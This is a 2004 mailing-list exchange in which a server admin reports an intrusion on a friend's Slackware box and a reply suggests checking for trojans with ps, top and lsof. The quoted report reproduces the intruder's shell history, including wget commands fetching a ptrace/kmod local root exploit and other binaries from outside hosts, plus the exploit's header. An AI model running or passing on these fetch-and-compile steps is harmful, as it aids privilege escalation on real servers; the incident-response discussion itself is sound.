Re: Visited by a cracker
From: Louie Miranda (lmiranda_at_gmail.com)
Date: Mon, 12 Jul 2004 09:54:35 +0800 To: email@example.com
Double check for trojans on your processes. Even if you did run
chkrootkit to check it out.
like: ps, top, ls
and try running this: lsof, if you have the time. try to look for more
On Sun, 11 Jul 2004 16:45:09 +0200, Per Christian B. Viken
> I've had a rather disturbing evening.
> A friend of mine runs a small server for himself and some friends. It's
> running slackware 10.
> When I logged in, I noticed that the load was way over what's normal (around
> 1.36 now, usually it's under 0.10), so I run 'top'. I see a program called
> 'strace' running, hogging all the cpu power.
> So I get curious. I chdir to the users home, and looks around. It's empty.
> But, the 'smart' little cracker has forgotten about .bash_history, so here I
> can see everything that he has been doing.
> Aparently, he has downloaded and setup an eggdrop, removed it again, and
> then downloaded a psybnc, which he also removed shortly. Then things get
> wget http://personal.telefonica.terra.es/web/alexb/e/ptrace-kmod.c
> gcc ptrace-kmod.c -o ptrace
> chmod +x ptrace
> rm -rf ptrace
> rm -rf ptrace-kmod.c
> wget www.drac.as.ro/egx
> chmod +x egx
> rm -rf egx
> wget 22.214.171.124/usage/apache.tar.gz
> The ptrace-kmod.c has this for a header:
> * Linux kernel ptrace/kmod local root exploit
> * This code exploits a race condition in kernel/kmod.c, which creates
> * kernel thread in insecure manner. This bug allows to ptrace cloned
> * process, allowing to take control over privileged modprobe binary.
> * Should work under all current 2.2.x and 2.4.x kernels.
> Luckily, the server runs 2.6.6, so this wasn't any threat.
> The 'egx' executable seems to be somewhat like the other, cause when I run
> it, it outputs '[-] Unable to determine kernel address: Operation not
> supported' and dies.
> My guesses are that the apache.tar.gz-file is also some kind of exploit, but
> I couldn't get it, so I didn't get a chance to see.
> Seeing that he didn't know how to properly hide his tracks, I hoped he might
> be stupid enough to use his own IP to log in from as well, so I run 'cat
> /var/log/messages | grep <username>'.
> But, he has logged in and out using 7 different Ips. 5 belonging to
> Pakistan, and the other two to Libanon.
> I've been suspicious to this user since my friend added him a few days ago.
> He actually got a domain, prepaid for three years for an account, so I did
> have some concerns about this.
> Now, after discovering this, I've talked with my friend, and the credit card
> used to paying for the domain, belongs to a woman in the UK. Probably stolen
> or something.
> I've run chkrootkit 0.43 and Rootkit Hunter 1.1.1 and they didn't find
> So, my real question is:
> Is there anything else I should check out? Anywhere else some nasty exploits
> or trojans might be hiding? And should I try to find this guy? Or is it
> probably hopeless?
> Best Regards,
> Per Christian B. Viken
> - --------------------------------------------
> ASCII ribbon campaign ( )
> - against HTML email X
> & vCards / \
-- Louie Miranda http://www.axishift.com